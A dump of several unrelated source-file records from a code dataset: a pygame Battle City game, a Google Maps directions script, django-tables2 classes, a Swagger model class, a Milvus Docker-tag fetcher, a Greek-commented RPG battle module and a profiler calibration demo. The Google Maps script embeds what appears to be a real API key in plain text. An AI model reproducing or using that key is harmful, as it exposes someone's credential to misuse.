0:\n\t\t\tself.col = 0\n\t\telif self.dir == 1:\n\t\t\tself.col 
= 2\n\t\tif self.dir == 2:\n\t\t\tself.col = 4\n\t\telif self.dir == 3:\n\t\t\tself.col = 6\n\t\tself.rect.x += self.velx\n\t\tself.rect.y += self.vely\n\t\tself.image = self.m[self.col][self.level]\n\nclass enemy(pygame.sprite.Sprite):\n\n\tdef __init__(self, matrix, pos_ini):\n\t\tpygame.sprite.Sprite.__init__(self)\n\t\tself.m = matrix\n\t\tself.col = 16\n\t\tself.level = 6\n\t\tself.dir = 2\n\t\tself.image = self.m[self.col][self.level]\n\t\tself.rect = self.image.get_rect()\n\t\tself.rect.x = pos_ini[0]\n\t\tself.rect.y = pos_ini[1]\n\t\tself.movement = pygame.mixer.Sound('sound_enemy_move.wav')\n\t\tself.velx = 0\n\t\tself.vely = 0\n\t\tself.borning = True\n\t\tself.cad = 50\n\n\tdef update(self):\n\t\tif self.dir == 0:\n\t\t\tself.col = 0\n\t\telif self.dir == 1:\n\t\t\tself.col = 2\n\t\tif self.dir == 2:\n\t\t\tself.col = 4\n\t\telif self.dir == 3:\n\t\t\tself.col = 6\n\t\tself.rect.x += self.velx\n\t\tself.rect.y += self.vely\n\t\tself.image = self.m[self.col][self.level]\n\t\tself.cad -= 1\n\nclass wall(pygame.sprite.Sprite):\n\n\tdef __init__(self, matrix, pos_ini):\n\t\tpygame.sprite.Sprite.__init__(self)\n\t\tself.m = matrix\n\t\tself.row = 0\n\t\tself.col = 0\n\t\tself.image = self.m\n\t\tself.rect = self.image.get_rect()\n\t\tself.rect.x = pos_ini[0]\n\t\tself.rect.y = pos_ini[1]\n\n\tdef update(self):\n\t\tself.image = self.m\n\nclass proyectil(pygame.sprite.Sprite):\n\n\tdef __init__(self, matrix, pos_ini):\n\t\tpygame.sprite.Sprite.__init__(self)\n\t\tself.m = matrix\n\t\tself.row = 0\n\t\tself.dir = 0\n\t\tself.image = self.m[self.dir][self.row]\n\t\tself.rect = self.image.get_rect()\n\t\tself.rect.x = pos_ini[0] \n\t\tself.rect.y = pos_ini[1]\n\t\tself.velx = 0\n\t\tself.vely = 0\n\n\tdef update(self):\n\t\tself.rect.y += self.vely \n\t\tself.rect.x += self.velx \n\nif __name__ == '__main__':\n\tpygame.init()\n\tscreen \t\t= \tpygame.display.set_mode([ANCHO,ALTO])\n\n\t#\tCUSTOMIZE THE IMAGE SPRITES\n\n\tintro_img \t= \tpygame.image.load('battlecity_intro_32pxl.png')\n\timg \t\t= \tpygame.image.load('battlecity_general_32pxl.png')\n\tinterfaz \t= \tpygame.image.load('interfaz_32pxl.png')\n\tblock \t\t= \tcut_img(img,16,0,32,32)\n\ttank\t\t= \tcut_img(img,0,0,208,26)\n\t#brick \t\t= \timg_matrix(block, 2, 4, 16, 8)\n\tdir_proy \t= \tpygame.image.load('img_proy_dir.png')\n\tproys \t\t= \timg_matrix(dir_proy, 4, 1, 8, 8)\n\tmi_imag \t= \timg_matrix(img, 25, 16, 32, 32)\n\tmov_tank\t=\timg_matrix(tank, 8, 1, 26, 26)\n\tmapa \t\t=\tconfigparser.ConfigParser()\n\tmapa.read('battle_mapa.map')\n\tsinfo \t\t=\t'info'\n\tmp \t\t\t= \tmapa.get('info', 'archivo')\n\tls_mp \t\t= \tmp.split('\\n')\n\tp_ini \t\t= \t218\n\tclock \t\t= \tpygame.time.Clock()\n\tintro = True\n\td = ALTO\n\t#pygame.display.flip()\n\twhile intro:\n\t\tif p_ini >= 314:\n\t\t\tp_ini = 218\n\t\tif d > 10:\n\t\t\tfor x in range(ALTO):\n\t\t\t\td = ALTO - x\n\t\t\t\tscreen.blit(intro_img, [0, d])\n\t\t\t\tpygame.display.flip()\n\t\t\tscreen.blit(mov_tank[7][0], [130,p_ini + 32])\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\tintro = False\n\t\t\tif event.type == pygame.KEYDOWN:\n\t\t\t\tif event.key == pygame.K_DOWN:\n\t\t\t\t\tp_ini = p_ini + 32\n\t\t\t\t\tscreen.blit(intro_img, [0, 0])\n\t\t\t\t\tscreen.blit(mov_tank[7][0], [130,p_ini])\n\t\t\t\t\tprint(p_ini)\n\t\t\t\tif event.key == pygame.K_SPACE:\n\n\t\t\t\t\tif p_ini == 250:\n\t\t\t\t\t\tintro = False\n\t\tpygame.display.flip()\n\n\t\t\n\n\t#\tCUSTOMIZE THE SOUND EFFECTS\n\n\n\t# CREATE GROUP\n\n\tgamers \t\t= 
\tpygame.sprite.Group()\n\tenemies\t\t=\tpygame.sprite.Group()\n\twalls\t\t= \tpygame.sprite.Group()\n\tproyectiles\t= \tpygame.sprite.Group()\n\tproy_enemy\t= \tpygame.sprite.Group()\n\n\t# CREAT GAMER\n\n\tg \t= \tgamer(mov_tank,[160,190])\n\tgamers.add(g)\n\n\t# CREATE WALLS\n\n\tfor j in range(len(ls_mp)):\t\n\t\tfor i,e in enumerate(ls_mp[j]):\n\t\t\tif e != '.':\n\t\t\t\tw = wall(mi_imag[int(mapa.get(e,'col'))][int(mapa.get(e,'fil'))], [(i*32) + 32, (j*32) + 16])\n\t\t\t\twalls.add(w)\n\n\t# CREATE ENEMIES\n\n\te = enemy(mi_imag,[0,0])\n\te.rect.x = random.randrange(ANCHO)\n\te.rect.y = 16\n\te.velx = 2\n\tenemies.add(e) \n\t\t\t\n\t# CREATE VARIABLES\n\n\t\n\tflag \t= \tTrue\n\tx = 0\n\n\t# INFO GAME\n\n\tfuente = pygame.font.Font(None, 25)\n\tcad = str(g.ups)\n\ttext_ups = fuente.render(cad, False, NEGRO)\n\tcad = 'SCORE'\n\ttext_score = fuente.render(cad, False, NEGRO)\n\n\t# GAME CYCLE\n\n\twhile flag:\n\n\t\t# Eventos\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\tflag = False\n\t\t\tif event.type == pygame.KEYUP:\n\t\t\t\tg.velx = 0\n\t\t\t\tg.vely = 0\n\t\t\t\tg.movement.stop()\n\t\t\tif event.type == pygame.KEYDOWN:\n\t\t\t\tif event.key == pygame.K_LEFT:\t\n\t\t\t\t\tg.movement.play()\n\t\t\t\t\tg.dir = 1\n\t\t\t\t\tg.velx -= 1\n\t\t\t\t\tg.vely = 0\n\t\t\t\tif event.key == pygame.K_RIGHT:\n\t\t\t\t\tg.movement.play()\t\n\t\t\t\t\tg.dir = 3\n\t\t\t\t\tg.velx += 1\n\t\t\t\t\tg.vely = 0\n\t\t\t\tif event.key == pygame.K_DOWN:\n\t\t\t\t\tg.movement.play()\t\n\t\t\t\t\tg.dir = 2\n\t\t\t\t\tg.vely += 1\n\t\t\t\t\tg.velx = 0\t\t\t\t\t\n\t\t\t\tif event.key == pygame.K_UP:\n\t\t\t\t\tg.movement.play()\t\n\t\t\t\t\tg.dir = 0\n\t\t\t\t\tg.vely -= 1\n\t\t\t\t\tg.velx = 0\n\t\t\t\tif event.key == pygame.K_SPACE:\n\t\t\t\t\tg.shot.play()\n\t\t\t\t\tp = proyectil(proys,[g.rect.x + 10,g.rect.y + 9])\n\t\t\t\t\tproyectiles.add(p)\n\t\t\t\t\tif g.dir == 0:\n\t\t\t\t\t\tp.vely = -4\n\t\t\t\t\tif g.dir == 2:\n\t\t\t\t\t\tp.vely = 4\n\t\t\t\t\tif g.dir == 1:\n\t\t\t\t\t\tp.velx = -4\n\t\t\t\t\tif g.dir == 3:\n\t\t\t\t\t\tp.velx = 4\n\n\t\t# CONTROL\n\n\t\t# LIMITES DEL MAPA\n\n\t\tls_col = pygame.sprite.spritecollide(g, walls, False)\n\t\tfor w in ls_col:\n\t\t\tif (g.rect.right > w.rect.left) and (g.velx > 0):\n\t\t\t\tg.rect.right = w.rect.left\n\t\t\t\tg.velx = 0\n\t\t\tif (g.rect.left < w.rect.right) and (g.velx < 0):\n\t\t\t\tg.rect.left = w.rect.right\n\t\t\t\tg.velx = 0\n\t\t\tif (g.rect.bottom > w.rect.top) and (g.vely > 0):\n\t\t\t\tg.rect.bottom = w.rect.top\n\t\t\t\tg.vely = 0\n\t\t\tif (g.rect.top < w.rect.bottom) and (g.vely < 0):\n\t\t\t\tg.rect.top = w.rect.bottom\n\t\t\t\tg.vely = 0\n\n\t\tif g.rect.x > (ANCHO - g.rect.width - 64):\n\t\t\tg.rect.x = ANCHO - g.rect.width - 64\n\t\t\tg.velx = 0\n\t\tif g.rect.x < 32:\n\t\t\tg.rect.x = 32\n\t\t\tg.velx = 0\n\t\tif g.rect.y > (ALTO - g.rect.height - 16):\n\t\t\tg.rect.y = ALTO - g.rect.height - 16\n\t\t\tg.velx = 0\n\t\tif g.rect.y < 16:\n\t\t\tg.rect.y = 16\n\t\t\tg.vely = 0\n\n\t\t# MOVIMIENTO ENEMIGO\n\n\n\n\t\tfor e in enemies:\n\t\t\tif e.rect.x > (ANCHO - e.rect.width - 64):\n\t\t\t\te.rect.x = ANCHO - e.rect.width - 64\n\t\t\t\te.velx = -2\n\t\t\tif e.rect.x < 32:\n\t\t\t\te.rect.x = 32\n\t\t\t\te.velx = 2\n\t\t\tif e.vely < 0:\n\t\t\t\te.dir = 0\n\t\t\tif e.vely > 0:\n\t\t\t\te.dir = 4\n\t\t\tif e.velx < 0:\n\t\t\t\te.dir = 1\n\t\t\tif e.velx > 0:\n\t\t\t\te.dir = 3\n\t\t\tif e.cad <= 0:\n\t\t\t\tp = proyectil(proys,[e.rect.x + 10,e.rect.y + 9])\n\t\t\t\tproy_enemy.add(p)\n\t\t\t\te.cad 
= 50\n\t\t\t\tp.vely = 2\n\n\t\t\t\n\t\t# ELIMINACION DE PROYECTILES DEL JUGADOR\n\t\tfor p in proyectiles:\n\t\t\tls_wall = pygame.sprite.spritecollide(p, walls, True)\n\t\t\tls_ene = pygame.sprite.spritecollide(p, enemies, True)\n\t\t\tfor e in ls_ene:\n\t\t\t\tproyectiles.remove(p)\n\t\t\tfor e in ls_wall:\n\t\t\t\tproyectiles.remove(p)\n\t\t\t\t'''m = mod([e.rect.x, e.rect.y])\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tmods.add(m)\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tm.vely = 7'''\n\t\t\tif p.rect.x > (ANCHO - p.rect.width - 64):\n\t\t\t\tproyectiles.remove(p)\n\t\t\tif p.rect.x < 32:\n\t\t\t\tproyectiles.remove(p)\n\t\t\tif p.rect.y > (ALTO - p.rect.height - 16):\n\t\t\t\tproyectiles.remove(p)\n\t\t\tif p.rect.y < 16:\n\t\t\t\tproyectiles.remove(p)\n\t\t\n\n\t\tgamers.update()\n\t\tenemies.update()\n\t\twalls.update()\n\t\tproyectiles.update()\n\t\tproy_enemy.update()\n\n\t\t# DISPLAY\n\n\t\tscreen.blit(interfaz, [0,0])\n\t\t#mapping(mi_imag, mapa, ls_mp, 32, 32)\n\t\tscreen.blit(text_ups, [484, 272])\n\t\tscreen.blit(text_score, [452, 10])\n\t\twalls.draw(screen)\n\t\tproyectiles.draw(screen)\n\t\tproy_enemy.draw(screen)\n\t\tgamers.draw(screen)\n\t\tenemies.draw(screen)\n\t\tpygame.display.flip()\n\t\tclock.tick(60)","sub_path":"Computacion grafica/Juegos/Juegos_de_ejemplo/Battle_City_2/BattleCity v 4.0.py","file_name":"BattleCity v 4.0.py","file_ext":"py","file_size_in_byte":8598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"525161074","text":"from datetime import timedelta, datetime\nfrom json import dump\n\nfrom googlemaps import Client\nfrom hjson import load\n\nfrom utils import package_response_to_geojson\n\nwith open('config.hjson') as f:\n config = load(f)\n\nAPI_KEY = 'AIzaSyCuNFYicUlXIeMz-5cCweA15HEJrQ-eut0'\ngmaps_client = Client(API_KEY)\n\nresponse = gmaps_client.directions(\n config['addresses']['Kronshtadt'],\n config['addresses']['Kolpino'],\n mode='driving',\n departure_time=datetime.now() + timedelta(minutes=2)\n)\n\ngeojson_package = package_response_to_geojson(response)\n\nwith open('output/geojson_package.json', 'w') as f:\n dump(geojson_package, f, indent=4, sort_keys=True)\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"505802522","text":"import django_tables2 as tables\nfrom .models import Speaker,User\n\nclass SpeakerTable(tables.Table):\n # average = tables.Column(accessor='get_avg')\n\n # def render_average(self,record):\n # return str(record.get_avg)\n #\n # def order_clothing(self, queryset, is_descending):\n # queryset = queryset.annotate(\n # amount=tables.F(\"shirts\") + tables.F(\"pants\")\n # ).order_by((\"-\" if is_descending else \") + \"amount\")\n # return (queryset, True)\n\n class Meta:\n model = Speaker\n template_name = \"django_tables2/bootstrap.html\"\n fields = (\"name\",\"avg\")\n\nclass UserTablePublic(tables.Table):\n ballot_set = tables.ManyToManyColumn()\n class Meta:\n\n model = User\n template_name = \"django_tables2/bootstrap.html\"\n fields = (\"id\",\"name\",'time')\n\nclass UserTable(tables.Table):\n link = tables.LinkColumn('delete_user',text=\"DELETE\",kwargs={\"userid\":tables.A(\"id\")})\n ballot_set = tables.ManyToManyColumn()\n class Meta:\n\n model = User\n template_name = \"django_tables2/bootstrap.html\"\n fields = (\"id\",\"name\",'link','time')\n\n\n# class SpeakerTable(tables.Table):\n# name = tables.Column()\n#\n# class 
PersonTable(tables.Table):\n# link = tables.LinkColumn('PaperDisplayDetails', kwargs={\"paper_id\": A(\"id\")},\n# class Meta:\n# model = Person\n# template_name = 'django_tables2/bootstrap.html'\n# fields = ('id', 'name', )\n\nclass FinalSpeakerTable(tables.Table):\n # average = tables.Column(accessor='get_avg')\n\n # def render_average(self,record):\n # return str(record.get_avg)\n #\n # def order_clothing(self, queryset, is_descending):\n # queryset = queryset.annotate(\n # amount=tables.F(\"shirts\") + tables.F(\"pants\")\n # ).order_by((\"-\" if is_descending else \") + \"amount\")\n # return (queryset, True)\n\n class Meta:\n model = Speaker\n attrs = {\"text-aligned\": \"center\"}\n template_name = \"django_tables2/bootstrap.html\"\n fields = (\"name\",\"votes\")\n","sub_path":"qipashuo/tables.py","file_name":"tables.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"295578314","text":"# coding: utf-8\n\n\"\"\"\n Determined API (Beta)\n\n Determined helps deep learning teams train models more quickly, easily share GPU resources, and effectively collaborate. Determined allows deep learning engineers to focus on building and training models at scale, without needing to worry about DevOps or writing custom code for common tasks like fault tolerance or experiment tracking. You can think of Determined as a platform that bridges the gap between tools like TensorFlow and PyTorch --- which work great for a single researcher with a single GPU --- to the challenges that arise when doing deep learning at scale, as teams, clusters, and data sets all increase in size. # noqa: E501\n\n OpenAPI spec version: 0.1\n Contact: community@determined.ai\n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\n\nclass V1CheckpointWorkload(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'uuid': 'str',\n 'start_time': 'datetime',\n 'end_time': 'datetime',\n 'state': 'Determinedcheckpointv1State',\n 'resources': 'dict(str, str)',\n 'total_batches': 'int'\n }\n\n attribute_map = {\n 'uuid': 'uuid',\n 'start_time': 'startTime',\n 'end_time': 'endTime',\n 'state': 'state',\n 'resources': 'resources',\n 'total_batches': 'totalBatches'\n }\n\n def __init__(self, uuid=None, start_time=None, end_time=None, state=None, resources=None, total_batches=None): # noqa: E501\n \"\"\"V1CheckpointWorkload - a model defined in Swagger\"\"\" # noqa: E501\n\n self._uuid = None\n self._start_time = None\n self._end_time = None\n self._state = None\n self._resources = None\n self._total_batches = None\n self.discriminator = None\n\n if uuid is not None:\n self.uuid = uuid\n self.start_time = start_time\n if end_time is not None:\n self.end_time = end_time\n self.state = state\n if resources is not None:\n self.resources = resources\n self.total_batches = total_batches\n\n @property\n def uuid(self):\n \"\"\"Gets the uuid of this V1CheckpointWorkload. # noqa: E501\n\n UUID of the checkpoint. # noqa: E501\n\n :return: The uuid of this V1CheckpointWorkload. 
# noqa: E501\n :rtype: str\n \"\"\"\n return self._uuid\n\n @uuid.setter\n def uuid(self, uuid):\n \"\"\"Sets the uuid of this V1CheckpointWorkload.\n\n UUID of the checkpoint. # noqa: E501\n\n :param uuid: The uuid of this V1CheckpointWorkload. # noqa: E501\n :type: str\n \"\"\"\n\n self._uuid = uuid\n\n @property\n def start_time(self):\n \"\"\"Gets the start_time of this V1CheckpointWorkload. # noqa: E501\n\n The time the workload was started. # noqa: E501\n\n :return: The start_time of this V1CheckpointWorkload. # noqa: E501\n :rtype: datetime\n \"\"\"\n return self._start_time\n\n @start_time.setter\n def start_time(self, start_time):\n \"\"\"Sets the start_time of this V1CheckpointWorkload.\n\n The time the workload was started. # noqa: E501\n\n :param start_time: The start_time of this V1CheckpointWorkload. # noqa: E501\n :type: datetime\n \"\"\"\n if start_time is None:\n raise ValueError(\"Invalid value for `start_time`, must not be `None`\") # noqa: E501\n\n self._start_time = start_time\n\n @property\n def end_time(self):\n \"\"\"Gets the end_time of this V1CheckpointWorkload. # noqa: E501\n\n The time the workload finished or was stopped. # noqa: E501\n\n :return: The end_time of this V1CheckpointWorkload. # noqa: E501\n :rtype: datetime\n \"\"\"\n return self._end_time\n\n @end_time.setter\n def end_time(self, end_time):\n \"\"\"Sets the end_time of this V1CheckpointWorkload.\n\n The time the workload finished or was stopped. # noqa: E501\n\n :param end_time: The end_time of this V1CheckpointWorkload. # noqa: E501\n :type: datetime\n \"\"\"\n\n self._end_time = end_time\n\n @property\n def state(self):\n \"\"\"Gets the state of this V1CheckpointWorkload. # noqa: E501\n\n The state of the checkpoint. # noqa: E501\n\n :return: The state of this V1CheckpointWorkload. # noqa: E501\n :rtype: Determinedcheckpointv1State\n \"\"\"\n return self._state\n\n @state.setter\n def state(self, state):\n \"\"\"Sets the state of this V1CheckpointWorkload.\n\n The state of the checkpoint. # noqa: E501\n\n :param state: The state of this V1CheckpointWorkload. # noqa: E501\n :type: Determinedcheckpointv1State\n \"\"\"\n if state is None:\n raise ValueError(\"Invalid value for `state`, must not be `None`\") # noqa: E501\n\n self._state = state\n\n @property\n def resources(self):\n \"\"\"Gets the resources of this V1CheckpointWorkload. # noqa: E501\n\n Dictionary of file paths to file sizes in bytes of all files in the checkpoint. # noqa: E501\n\n :return: The resources of this V1CheckpointWorkload. # noqa: E501\n :rtype: dict(str, str)\n \"\"\"\n return self._resources\n\n @resources.setter\n def resources(self, resources):\n \"\"\"Sets the resources of this V1CheckpointWorkload.\n\n Dictionary of file paths to file sizes in bytes of all files in the checkpoint. # noqa: E501\n\n :param resources: The resources of this V1CheckpointWorkload. # noqa: E501\n :type: dict(str, str)\n \"\"\"\n\n self._resources = resources\n\n @property\n def total_batches(self):\n \"\"\"Gets the total_batches of this V1CheckpointWorkload. # noqa: E501\n\n Total number of batches as of this workload's completion. # noqa: E501\n\n :return: The total_batches of this V1CheckpointWorkload. # noqa: E501\n :rtype: int\n \"\"\"\n return self._total_batches\n\n @total_batches.setter\n def total_batches(self, total_batches):\n \"\"\"Sets the total_batches of this V1CheckpointWorkload.\n\n Total number of batches as of this workload's completion. 
# noqa: E501\n\n :param total_batches: The total_batches of this V1CheckpointWorkload. # noqa: E501\n :type: int\n \"\"\"\n if total_batches is None:\n raise ValueError(\"Invalid value for `total_batches`, must not be `None`\") # noqa: E501\n\n self._total_batches = total_batches\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n if issubclass(V1CheckpointWorkload, dict):\n for key, value in self.items():\n result[key] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, V1CheckpointWorkload):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","sub_path":"harness/determined/_swagger/client/models/v1_checkpoint_workload.py","file_name":"v1_checkpoint_workload.py","file_ext":"py","file_size_in_byte":8405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"122754606","text":"import requests\nimport json\n\nmilvus_dev = \"https://registry.hub.docker.com/v2/repositories/milvusdb/milvus-dev/tags?ordering=last_updated\"\nmilvus = \"https://registry.hub.docker.com/v2/repositories/milvusdb/milvus/tags?ordering=last_updated\"\n\n\ndef get_tag(url):\n payload = {}\n headers = {}\n\n response = requests.request(\"GET\", url, headers=headers, data=payload)\n\n res = response.json()[\"results\"]\n tags = [r[\"name\"] for r in res]\n return tags\n\n\nlatest_tag = \"master-latest\"\nlatest_rc_tag = [tag for tag in sorted(get_tag(milvus)) if \"rc\" and \"v\" in tag][-1]\nrelease_version = \"-\".join(latest_rc_tag.split(\"-\")[:-2])\nprint(release_version)\nprint(latest_tag, latest_rc_tag)\n\ndata = {\n \"latest_tag\": latest_tag,\n \"latest_rc_tag\": latest_rc_tag[1:],\n \"release_version\": release_version\n}\nprint(data)\nwith open(\"tag_info.json\", \"w\") as f:\n f.write(json.dumps(data))\n","sub_path":"tests/python_client/deploy/scripts/get_tag.py","file_name":"get_tag.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"355882866","text":"import random\nfrom .magic import Spell\nfrom .inventory import Item\n\n\n# Χρώματα για διάφορες ενέργειες\nclass Colors:\n header = '\\033[95m'\n blue = '\\033[94m'\n green = '\\033[92m'\n warning = '\\033[93m'\n fail = '\\033[91m'\n end_color = '\\033[0m'\n bold = '\\033[1m'\n underline = '\\033[4m'\n\n\n# Δημιουργούμε κλάση ανθρώπου και φτιάχνουμε πόντους ζωής , πόντους μαγείας , επίθεση, άμυνα, μαγεία και ενέργειες για επίθεση και άμυνα\nclass Person:\n def __init__(self, name, hp, mp, atk, df, magic, items):\n self.name = name\n self.max_hp = hp\n self.hp = hp\n self.max_mp = mp\n self.mp = mp\n 
self.atk_low = atk - 10\n self.atk_high = atk + 10\n self.df = df\n self.magic = magic\n self.items = items\n self.actions = [\"Απλή Επίθεση\", \"Μαγεία\", \"Αντικείμενα\"]\n\n # Δημιουργούμε μέθοδο για την επίθεση\n def generate_damage(self):\n return random.randrange(self.atk_low, self.atk_high)\n\n # Δημιουργούμε μέθοδο για το dmg που τρώει είτε ο παίχτης είτε ο αντίπαλοσ\n def take_damage(self, dmg):\n self.hp -= dmg\n if self.hp < 0:\n self.hp = 0\n return self.hp\n\n # Μέθοδος για να healαρεις\n def heal(self, dmg):\n self.hp += dmg\n if self.hp > self.max_hp:\n self.hp = self.max_hp\n\n # Μέθοδος για να μας επιστρέφει τους πόντους ζωής\n def get_hp(self):\n return self.hp\n\n # Μέθοδος για να μας επιστρέφει τους μέγιστους πόντους ζωής\n def get_max_hp(self):\n return self.max_hp\n\n # Μέθοδος για να μας επιστρέφει τους πόντους μαγείας\n def get_mp(self):\n return self.mp\n\n # Μέθοδος για να μας επιστρέφει τους μέγιστους πόντους μαγείας\n def get_max_mp(self):\n return self.max_mp\n\n # Μέθοδος που μειώνει τους πόντους μαγείας με το κόστος του spell\n def reduce_mp(self, cost):\n self.mp -= cost\n\n # Μέθοδος για να διαλέξουμε ενέργεια από τη λίστα\n def choose_action(self):\n i = 1\n print(\"\\n\" + \" \" + Colors.bold + self.name + Colors.end_color)\n print(Colors.blue + Colors.bold + \" ΕΝΕΡΓΕΙΕΣ:\" + Colors.end_color)\n for item in self.actions:\n print(\" \" + str(i) + \".\", item)\n i += 1\n\n # Μέθοδος για να διαλέξουμε spell από τη λίστα\n def choose_magic(self):\n i = 1\n print(\"\\n\" + \" \" + Colors.blue + Colors.bold + \" ΞΟΡΚΙΑ:\" + Colors.end_color)\n for spell in self.magic:\n print(\" \" + str(i) + \".\", spell.name, \"(κόστος:\", str(spell.cost) + \")\")\n i += 1\n\n # Μέθοδος για να διαλέξουμε αντικείμενα από τη λίστα\n def choose_item(self):\n i = 1\n print(\"\\n\" + \" \" + Colors.green + Colors.bold + \" ΑΝΤΙΚΕΙΜΕΝΑ:\" + Colors.end_color)\n for item in self.items:\n print(\" \" + str(i) + \".\", item[\"item\"].name + \":\", item[\"item\"].description,\n \"(x\" + str(item[\"quantity\"]) + \")\")\n i += 1\n\n # Μέθοδος για να επιλέξουμε σε ποιον αντίπαλο θα επιτεθούμε\n def choose_target(self, enemies):\n i = 1\n\n print(\"\\n\" + Colors.fail + Colors.bold + \" ΕΧΘΡΟΣ:\" + Colors.end_color)\n for enemy in enemies:\n if enemy.get_hp() != 0:\n print(\" \" + str(i) + \".\", enemy.name)\n i += 1\n choice = int(input(\" Επιλέξτε αντίπαλο: \")) - 1\n return choice\n\n # Μέθοδος για να παίρνει τα στατιστικά του αντιπάλου\n def get_enemy_stats(self):\n hp_bar = \"\"\n bar_ticks = (self.hp / self.max_hp) * 100 / 2\n\n while bar_ticks > 0:\n hp_bar += \"█\"\n bar_ticks -= 1\n\n while len(hp_bar) < 50:\n hp_bar += \" \"\n\n hp_string = str(self.hp) + \"/\" + str(self.max_hp)\n current_hp = \"\"\n\n if len(hp_string) < 9:\n decreased = 11 - len(hp_string)\n\n while decreased > 0:\n current_hp += \" \"\n decreased -= 1\n\n current_hp += hp_string\n else:\n current_hp = hp_string\n\n print(Colors.bold + self.name + \" \" + current_hp + \" \" + Colors.fail + hp_bar + Colors.end_color)\n\n # Μέθοδος για τα στατιστικά των παιχτών (ζωή και μαγεία)\n # Χωρίζει την μπάρα σε τμήματα και καθε φορά ανάλογα με την αυξομείωση ζωής αλλάζει είτε προσθέτοντας είτε αφαιρώντας τα κουτιά (ASCI code 219)\n def get_stats(self):\n hp_bar = \"\"\n bar_ticks = (self.hp / self.max_hp) * 100 / 4\n\n mp_bar = \"\"\n mp_ticks = (self.mp / self.max_mp) * 100 / 10\n\n while bar_ticks > 0:\n hp_bar += \"█\"\n bar_ticks -= 1\n\n while len(hp_bar) < 25:\n hp_bar += \" \"\n\n while mp_ticks > 0:\n mp_bar += 
\"█\"\n mp_ticks -= 1\n\n while len(mp_bar) < 10:\n mp_bar += \" \"\n hp_string = str(self.hp) + \"/\" + str(self.max_hp)\n current_hp = \"\"\n\n if len(hp_string) < 9:\n decreased = 9 - len(hp_string)\n\n while decreased > 0:\n current_hp += \" \"\n decreased -= 1\n\n current_hp += hp_string\n else:\n current_hp = hp_string\n\n mp_string = str(self.mp) + \"/\" + str(self.max_mp)\n current_mp = \"\"\n\n if len(mp_string) < 7:\n decreased = 7 - len(mp_string)\n while decreased > 0:\n current_mp += \" \"\n decreased -= 1\n\n current_mp += mp_string\n\n else:\n current_mp = mp_string\n\n print(Colors.bold + self.name + \" \" +\n current_hp + Colors.green + \" \" + hp_bar + Colors.end_color + \" \" + Colors.bold +\n current_mp + Colors.blue + \" \" + mp_bar + Colors.end_color)\n\n # Μέθοδος για το πως θα επιλέγει ο αντίπαλος spells\n\n def choose_enemy_spell(self):\n magic_choice = random.randrange(0, len(self.magic))\n spell = self.magic[magic_choice]\n magic_dmg = spell.generate_damage()\n\n pct = self.hp / self.max_hp * 100\n\n if self.mp < spell.cost or spell.type == \"white\" and pct > 50:\n self.choose_enemy_spell()\n return spell, magic_dmg\n else:\n return spell, magic_dmg\n","sub_path":"battle/classes/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":7179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"530381574","text":"\"\"\"\nThe numbers will vary slightly but you should be able to get a fair estimate of the bias using this code. If the numbers still vary a lot, you can increase the trials from 100000 to something even larger. This type of calibration only works for the profile module, but if you are looking for more accurate results and the cProfile module does not work for you due to inheritance or not being supported on your platform, you can use this code to set your bias globally and get more accurate results\n\"\"\"\n\nimport sys\nimport functools\nimport pstats\nimport profile\n\n\n@functools.lru_cache()\ndef fibonacci_cached(n):\n if n < 2:\n return n\n else:\n return fibonacci_cached(n - 1) + fibonacci_cached(n - 2)\n\n\ndef fibonacci(n):\n if n < 2:\n return n\n else:\n return fibonacci(n - 1) + fibonacci(n - 2)\n\n\nif __name__ == '__main__':\n # first calculate the bias system has\n if sys.argv[-2] == 'True':\n profiler = profile.Profile()\n for i in range(10):\n print(profiler.calibrate(100000))\n else:\n profiler = profile.Profile(bias=1.213882501176391e-06) # this bias has been taken from upper run\n n = 30\n\n if sys.argv[-1] == 'cache':\n profiler.runcall(fibonacci_cached, n)\n else:\n profiler.runcall(fibonacci, n)\n\n stats = pstats.Stats(profiler).sort_stats('calls')\n stats.print_stats()\n\n# Terminal python 03_calibration.py False 